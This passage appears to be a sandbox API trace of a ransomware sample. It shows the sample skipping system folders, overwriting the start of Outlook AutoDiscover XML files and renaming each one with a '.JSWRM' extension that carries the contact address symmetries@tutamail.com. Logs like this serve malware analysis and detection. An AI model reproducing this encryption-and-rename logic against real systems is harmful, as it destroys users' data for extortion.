lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.UK.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.uk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.951] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=810) returned 1 [0137.951] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.951] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.952] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.952] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.952] CloseHandle (hObject=0x238) returned 1 [0137.953] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.UK.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.uk.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.UK.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.uk.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.954] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c969bd6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.AR.XML", cAlternateFileName="YAHOOC~2.XML")) returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2=".") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="..") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="...") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="windows") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="recovery") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="perflogs") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="documents and settings") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="system volume information") returned 1 [0137.954] lstrcmpiW (lpString1="YAHOO.COM.AR.XML", lpString2="msocache") returned 1 [0137.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.AR.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.AR.XML", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.AR.XML", lpUsedDefaultChar=0x0) returned 16 [0137.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.AR.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.AR.XML", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.AR.XML", lpUsedDefaultChar=0x0) returned 16 [0137.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.AR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.ar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.955] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.955] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.955] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.960] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.960] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.960] CloseHandle (hObject=0x238) returned 1 [0137.960] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.AR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.ar.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.AR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.ar.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.961] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c98fe3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c98fe3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c98fe3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.AU.XML", cAlternateFileName="YA02CD~1.XML")) returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2=".") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="..") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="...") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="windows") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="recovery") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="perflogs") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="documents and settings") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="system volume information") returned 1 [0137.961] lstrcmpiW (lpString1="YAHOO.COM.AU.XML", lpString2="msocache") returned 1 [0137.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.AU.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.AU.XML", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.AU.XML", lpUsedDefaultChar=0x0) returned 16 [0137.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.AU.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.AU.XML", cchWideChar=16, lpMultiByteStr=0x241330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.AU.XML", lpUsedDefaultChar=0x0) returned 16 [0137.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.AU.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.au.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.963] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.963] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.963] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.964] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.964] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.965] CloseHandle (hObject=0x238) returned 1 [0137.965] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.AU.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.au.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.AU.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.au.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.966] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d2f32c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d2f32c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.BR.XML", cAlternateFileName="YA6DAE~1.XML")) returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2=".") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="..") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="...") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="windows") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="recovery") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="perflogs") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="documents and settings") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="system volume information") returned 1 [0137.966] lstrcmpiW (lpString1="YAHOO.COM.BR.XML", lpString2="msocache") returned 1 [0137.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.BR.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.BR.XML", cchWideChar=16, lpMultiByteStr=0x241290, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.BR.XML", lpUsedDefaultChar=0x0) returned 16 [0137.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.BR.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.BR.XML", cchWideChar=16, lpMultiByteStr=0x2412b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.BR.XML", lpUsedDefaultChar=0x0) returned 16 [0137.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.BR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.br.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.967] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.967] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.968] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.969] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.969] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.969] CloseHandle (hObject=0x238) returned 1 [0137.969] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.BR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.br.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.BR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.br.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.970] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c98fe3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c98fe3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.CN.XML", cAlternateFileName="YA819F~1.XML")) returned 1 [0137.970] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2=".") returned 1 [0137.970] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="..") returned 1 [0137.970] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="...") returned 1 [0137.970] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="windows") returned 1 [0137.970] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="recovery") returned 1 [0137.971] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="perflogs") returned 1 [0137.971] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="documents and settings") returned 1 [0137.971] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.971] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="system volume information") returned 1 [0137.971] lstrcmpiW (lpString1="YAHOO.COM.CN.XML", lpString2="msocache") returned 1 [0137.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.CN.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.CN.XML", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.CN.XML", lpUsedDefaultChar=0x0) returned 16 [0137.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.CN.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.CN.XML", cchWideChar=16, lpMultiByteStr=0x240f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.CN.XML", lpUsedDefaultChar=0x0) returned 16 [0137.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.971] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.CN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.cn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.972] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.972] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.972] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.974] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.974] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.974] CloseHandle (hObject=0x238) returned 1 [0137.974] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.CN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.cn.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.CN.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.cn.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.975] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c98fe3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c98fe3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.HK.XML", cAlternateFileName="YA56AC~1.XML")) returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2=".") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="..") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="...") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="windows") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="recovery") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="perflogs") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="documents and settings") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="system volume information") returned 1 [0137.975] lstrcmpiW (lpString1="YAHOO.COM.HK.XML", lpString2="msocache") returned 1 [0137.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.HK.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.HK.XML", cchWideChar=16, lpMultiByteStr=0x241218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.HK.XML", lpUsedDefaultChar=0x0) returned 16 [0137.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.HK.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.HK.XML", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.HK.XML", lpUsedDefaultChar=0x0) returned 16 [0137.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.HK.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.hk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 